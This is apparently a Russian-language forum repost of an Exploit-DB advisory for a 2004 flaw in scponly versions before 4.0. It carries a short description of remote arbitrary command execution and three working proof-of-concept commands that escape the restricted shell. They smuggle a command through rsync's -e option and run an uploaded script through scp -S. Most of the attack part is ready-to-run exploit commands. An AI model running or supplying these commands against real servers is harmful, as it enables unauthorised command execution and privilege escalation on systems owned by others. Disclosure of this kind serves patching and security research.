- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24794
- Проверка EDB
-
- Пройдено
- Автор
- JASON WIES
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2004-12-02
SCPOnly 2.x/3.x - Arbitrary Command Execution
Код:
source: https://www.securityfocus.com/bid/11791/info
scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.
Versions prior to 4.0 are reported susceptible to this issue.
ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'
scp command.sh restricteduser@remotehost:/tmp/command.sh
ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
- Источник
- www.exploit-db.com